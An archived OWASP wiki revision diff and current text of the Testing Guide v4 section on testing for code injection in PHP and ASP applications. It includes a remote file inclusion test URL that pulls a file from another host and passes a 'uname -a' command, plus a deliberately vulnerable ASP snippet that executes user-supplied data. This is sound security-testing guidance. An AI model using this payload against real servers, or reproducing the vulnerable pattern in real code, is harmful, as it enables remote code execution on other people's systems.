This site is the archived OWASP Foundation Wiki and is no longer accepting Account Requests.
To view the new OWASP Foundation website, please visit https://owasp.org

Difference between revisions of "Testing for Code Injection (OTG-INPVAL-012)"

From OWASP
Jump to: navigation, search
m (Gray Box testing and example)
 
(12 intermediate revisions by 4 users not shown)
Line 1: Line 1:
[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]<br>
+
{{Template:OWASP Testing Guide v4}}
{{Template:OWASP Testing Guide v2}}
 
  
== Brief Summary ==
+
== Summary ==
 
   
 
   
This section describes how a tester can check if it is possible to enter code as input on a web page and have it executed by the web server. More information about Code Injection can be found at http://www.owasp.org/index.php/Code_Injection
+
This section describes how a tester can check if it is possible to enter code as input on a web page and have it executed by the web server.  
  
== Description of the Issue ==
 
 
   
 
   
In code injection testing, a tester submits input that is processed by the web server as dynamic code or as an included file.  These tests can target various server-side scripting engines, e.g.., ASP or PHP. Proper input validation and secure coding practices need to be employed to protect against these attacks.
+
In [[Code Injection]] testing, a tester submits input that is processed by the web server as dynamic code or as an included file.  These tests can target various server-side scripting engines, e.g.., ASP or PHP. Proper input validation and secure coding practices need to be employed to protect against these attacks.
  
== Black Box testing and example ==
+
==How to Test==
 +
 
 +
=== Black Box testing ===
 
   
 
   
'''Testing for PHP Injection vulnerabilities:'''
+
====Testing for PHP Injection vulnerabilities====
  
Using the querystring, the tester can inject code (in this example, a malicious url) to be processed as part of the included file:
+
Using the querystring, the tester can inject code (in this example, a malicious URL) to be processed as part of the included file:
  
 
  <nowiki>http://www.example.com/uptime.php?pin=http://www.example2.com/packx1/cs.jpg?&cmd=uname%20-a</nowiki>
 
  <nowiki>http://www.example.com/uptime.php?pin=http://www.example2.com/packx1/cs.jpg?&cmd=uname%20-a</nowiki>
Line 23: Line 23:
 
The malicious URL is accepted as a parameter for the PHP page, which will later use the value in an included file.
 
The malicious URL is accepted as a parameter for the PHP page, which will later use the value in an included file.
  
== Gray Box testing and example ==
 
  
'''Testing for ASP Code Injection vulnerabilities
+
=== Gray Box testing ===
 +
 
 +
====Testing for ASP Code Injection vulnerabilities====
  
 
Examine ASP code for user input used in execution functions. Can the user enter commands into the Data input field?  Here, the ASP code will save the input to a file and then execute it:
 
Examine ASP code for user input used in execution functions. Can the user enter commands into the Data input field?  Here, the ASP code will save the input to a file and then execute it:
Line 51: Line 52:
 
  End If
 
  End If
 
  %>)))
 
  %>)))
 +
  
 
== References ==
 
== References ==
Line 60: Line 62:
 
* Wikipedia - http://www.wikipedia.org
 
* Wikipedia - http://www.wikipedia.org
  
* OWASP Code Review - http://www.owasp.org/index.php/OS_Injection
+
* Reviewing Code for [[OS Injection]]
 
<br>
 
<br>
{{Category:OWASP Testing Project AoC}}
 

Latest revision as of 12:04, 8 August 2014

This article is part of the new OWASP Testing Guide v4.
Back to the OWASP Testing Guide v4 ToC: https://www.owasp.org/index.php/OWASP_Testing_Guide_v4_Table_of_Contents Back to the OWASP Testing Guide Project: https://www.owasp.org/index.php/OWASP_Testing_Project

Summary

This section describes how a tester can check if it is possible to enter code as input on a web page and have it executed by the web server.


In Code Injection testing, a tester submits input that is processed by the web server as dynamic code or as an included file. These tests can target various server-side scripting engines, e.g.., ASP or PHP. Proper input validation and secure coding practices need to be employed to protect against these attacks.

How to Test

Black Box testing

Testing for PHP Injection vulnerabilities

Using the querystring, the tester can inject code (in this example, a malicious URL) to be processed as part of the included file:

http://www.example.com/uptime.php?pin=http://www.example2.com/packx1/cs.jpg?&cmd=uname%20-a


Result Expected:

The malicious URL is accepted as a parameter for the PHP page, which will later use the value in an included file.


Gray Box testing

Testing for ASP Code Injection vulnerabilities

Examine ASP code for user input used in execution functions. Can the user enter commands into the Data input field? Here, the ASP code will save the input to a file and then execute it:

<%
If not isEmpty(Request( "Data" ) ) Then
Dim fso, f
'User input Data is written to a file named data.txt
Set fso = CreateObject("Scripting.FileSystemObject")
Set f = fso.OpenTextFile(Server.MapPath( "data.txt" ), 8, True)
f.Write Request("Data") & vbCrLf
f.close
Set f = nothing
Set fso = Nothing
'Data.txt is executed
Server.Execute( "data.txt" )
Else
%>
<form>
<input name="Data" /><input type="submit" name="Enter Data" />
</form>
<%
End If
%>)))


References